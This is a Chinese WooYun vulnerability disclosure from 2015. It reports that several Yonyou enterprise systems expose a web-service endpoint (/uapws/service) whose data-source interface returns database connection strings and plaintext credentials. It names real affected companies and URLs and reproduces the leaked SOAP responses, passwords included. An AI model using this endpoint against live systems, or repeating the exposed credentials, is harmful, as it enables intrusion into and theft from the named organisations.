当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112834

漏洞标题:用友多个系统通用漏洞导致接口信息泄露引发多数据库信息泄露(涉及多个大型厂商)

相关厂商:用友软件

漏洞作者: 路人甲

提交时间:2015-05-08 14:12

修复时间:2015-05-13 14:14

公开时间:2015-05-13 14:14

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-08: 细节已通知厂商并且等待厂商处理中
2015-05-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

*

详细说明:

aaa.png

通过webservice接口泄露,涉及多个系统
一、NC系统
http://123.232.105.202/
http://erp.suning.com.cn/
http://115.238.57.245/
以苏宁为例。
接口地址:http://erp.suning.com.cn/uapws/service
会发现很多接口,以数据库内网链接泄露为例(太多接口了,不一一测试了)
得到数据库内网链接为:http://erp.suning.com.cn/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl
利用接口测试工具调用接口得到数据库链接为:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<ns0:Urc xmlns:ns0="http://ws.uap.nc/lang">
<datasource>design</datasource>
<corpCode>simpchn</corpCode>
<userCode>#UAP#</userCode>
<langCode>simpchn</langCode>
</ns0:Urc>
</soap:Header>
<soap:Body>
<ns1:getDataSourceConfigResponse xmlns:ns1="http://inittool.ses.itf.nc/PortalSESInitToolService">
<return>nc57</return>
<return>jdbc:oracle:thin:@10.0.0.30:1521:orcl</return>
<return>nc35</return>
<return>is0h1idu</return>
</ns1:getDataSourceConfigResponse>
</soap:Body>
</soap:Envelope>


全部明文,数据库账号密码以及库名均是明文
二、门户系统
http://hr.sbtjt.com/portal/app/mockapp/login.jsp?lrid=1
http://gpms.foton.com.cn/portal/app/mockapp/login.jsp?lrid=1
http://fm2.cscec.com/portal/app/mockapp/login.jsp?lrid=767685128
以福田汽车为例
全部接口地址:http://gpms.foton.com.cn/uapws/service
数据库接口地址:http://gpms.foton.com.cn/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<ns0:Urc xmlns:ns0="http://ws.uap.nc/lang">
<ns0:datasource>design</ns0:datasource>
<ns0:userCode>1001FF1000000000J580</ns0:userCode>
<ns0:langCode>simpchn</ns0:langCode>
</ns0:Urc>
</soap:Header>
<soap:Body>
<ns1:getDataSourceConfigResponse xmlns:ns1="http://inittool.ses.itf.nc/PortalSESInitToolService">
<return>foton</return>
<return>jdbc:oracle:thin:@172.24.6.101:1521:gpms</return>
<return>hwpj63</return>
<return>asdzxc</return>
</ns1:getDataSourceConfigResponse>
</soap:Body>
</soap:Envelope>


得到的数据库链接地址和账号密码,依旧明文
三、另一版本NC系统
http://bap.ufida.com/
http://www.bewg.net.cn/
以用友官网系统为例
全部接口链接:http://bap.ufida.com/uapws/service
数据库接口链接:http://bap.ufida.com/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<ns0:Urc xmlns:ns0="http://ws.uap.nc/lang">
<ns0:datasource>design</ns0:datasource>
<ns0:userCode>#UAP#</ns0:userCode>
<ns0:langCode>simpchn</ns0:langCode>
</ns0:Urc>
</soap:Header>
<soap:Body>
<ns1:getDataSourceConfigResponse xmlns:ns1="http://inittool.ses.itf.nc/PortalSESInitToolService">
<return>design</return>
<return>jdbc:oracle:thin:@127.0.0.1:1521:orcl</return>
<return>ba_demo_design20131231</return>
<return>1</return>
</ns1:getDataSourceConfigResponse>
</soap:Body>
</soap:Envelope>


四、电子商务采购平台
http://61.178.99.236:9002/ebvp/
http://www.xinfagroup.com.cn:8080/ebvp/
http://zc.hayao.com:8080/ebvp/
http://221.1.83.115:9001/ebvp
以信发公司为例
全部接口地址:http://www.xinfagroup.com.cn:8080/uapws/service/
数据库接口地址:http://www.xinfagroup.com.cn:8080/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl
数据库链接:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<ns0:Urc xmlns:ns0="http://ws.uap.nc/lang">
<ns0:datasource>design</ns0:datasource>
<ns0:userCode>#UAP#</ns0:userCode>
<ns0:langCode>simpchn</ns0:langCode>
</ns0:Urc>
</soap:Header>
<soap:Body>
<ns1:getDataSourceConfigResponse xmlns:ns1="http://inittool.ses.itf.nc/PortalSESInitToolService">
<return>nc</return>
<return>jdbc:oracle:thin:@(DESCRIPTION=(ADDRESS = (PROTOCOL = TCP)(HOST = 10.10.1.34)(PORT = 1521))(ADDRESS = (PROTOCOL = TCP)(HOST =10.10.1.33)(PORT = 1521))(LOAD_BALANCE = yes)(CONNECT_DATA = (SERVER = DEDICATED)(SERVICE_NAME = orcl_rac)))</return>
<return>nc</return>
<return>xinfajituan</return>
</ns1:getDataSourceConfigResponse>
</soap:Body>
</soap:Envelope>


依旧全部明文
设计用友多个系统,只要在网站后面加uapws/service即可查看该系统的所有接口,我只是测试了数据库接口的信息,而且数据库基本都是明文显示,危害还是很大的。

漏洞证明:

修复方案:

*

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-13 14:14

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论